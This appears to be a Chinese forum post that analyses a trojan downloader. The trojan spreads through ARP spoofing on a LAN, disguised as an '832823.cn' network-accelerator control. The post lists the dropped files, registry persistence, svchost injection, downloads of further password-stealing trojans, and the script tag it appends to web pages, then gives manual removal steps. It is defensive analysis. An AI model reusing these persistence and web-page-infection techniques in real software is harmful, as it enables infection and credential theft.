拿到了病毒样本,分析了一下:
这是一个木马下载器,并可以在局域网内发起arp欺骗攻击,使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件,如图.
其实这个控件是一个abc.cab的压缩包 里面TestSign.exe为病毒主体,并非所谓的网络加速器,TestSign.inf为相应安装信息
病毒运行后:
1.释放如下副本:
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg
%systemroot%\system32\drivers\pcibus.sys
2.添加注册表启动项目
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
<comrepl32><%systemroot%\system32\com\comrepl32.exe> 的项目达到开机启动的目的
3.启动一个svchost.exe进程,将自身代码注入到该svchost.exe进程中,并通过svchost.exe进程下载 http://*/elf_listo.txt到system32\taimpo.txt并读取里面的内容(里面一般为要下载的病毒文件列表),之后下载http://*/*1.exe~http://*/*21.exe到C:\并命名为conime.exe~conime0.exe
4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件,在其后面添加<script language=javascript src=http://*/abc.js></script>的代码
5.试图连接局域网内其他用户电脑,并可能发送类似<script language=javascript src=http://*/abc.js></script>的数据包。(但未证实)
当局域网中有用户中毒时,会自动执行http://*/abc.js的代码,从而下载http://*/abc.cab文件,宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况,上述下载的木马和病毒中几乎都是盗号木马,最后一个为机器狗病毒,该病毒可以突破还原卡并修改userinit.exe文件,使得userinit.exe成为一个新的木马下载者.
清除办法:
局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况,需要查找相应的中毒机器。找到后可以按照如下方法进行杀毒操作。
sreng(该软件下载地址:http://www.motoyi.com/Down/Noted/200705/Down_28.shtml):
一、清除病毒主程序
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<comrepl32><%systemroot%\system32\com\comrepl32.exe> []
2.双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定,删除如下文件
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg
%systemroot%\system32\drivers\pcibus.sys
二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新,所以以下方法仅供参考)
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><%systemroot%\upxdnd.exe> []
<WinForm><%systemroot%\WinForm.exe> []
<MsIMMs32><%systemroot%\MsIMMs32.exe> []
<GenProtect><%systemroot%\GenProtect.exe> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<%systemroot%\AVPSrv.exe> []
<NVDispDrv><%systemroot%\NVDispDrv.exe> []
<WinSysW><%systemroot%\swchost.exe> []
<KVP><%systemroot%\system32\drivers\svchost.exe> []
<Kvsc3><%systemroot%\Kvsc3.exe> []
<WinSysM><%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
系统修复 高级修复里面 选择重置winsock 重启计算机,重启后双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
删除如下文件
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao
%Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp
%systemroot%\system32\drivers\pcibus.sys
%systemroot%\system32\drivers\svchost.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\djatl.dll
%systemroot%\system32\GenProtect.dll
%systemroot%\system32\gjatl.dll
%systemroot%\system32\ikewriyriu.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\MsIMMs32.dll
%systemroot%\system32\msplay32.dll
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\sqmapi32.dll
%systemroot%\system32\upxdnd.dll
%systemroot%\system32\WinForm.dll
%systemroot%\system32\wlatl.dll
%systemroot%\system32\zhjtrx.dll
%systemroot%\system32\zxatl.dll
%systemroot%\AVPSrv.exe
%systemroot%\cmdbcs.exe
%systemroot%\GenProtect.exe
%systemroot%\IGM.exe
%systemroot%\Kvsc3.exe
%systemroot%\MsIMMs32.exe
%systemroot%\NVDispDrv.exe
%systemroot%\swchost.exe
%systemroot%\upxdnd.exe
%systemroot%\WinForm.exe
%systemroot%\system32\sqmapi32.dll
2.修复被感染的html等网页文件
推荐使用CSI的iframkill
下载地址:http://www.motoyi.com/Down/Noted/200710/Down_83.shtml
3.建议广大网管屏蔽这个ip地址:60.190.101.206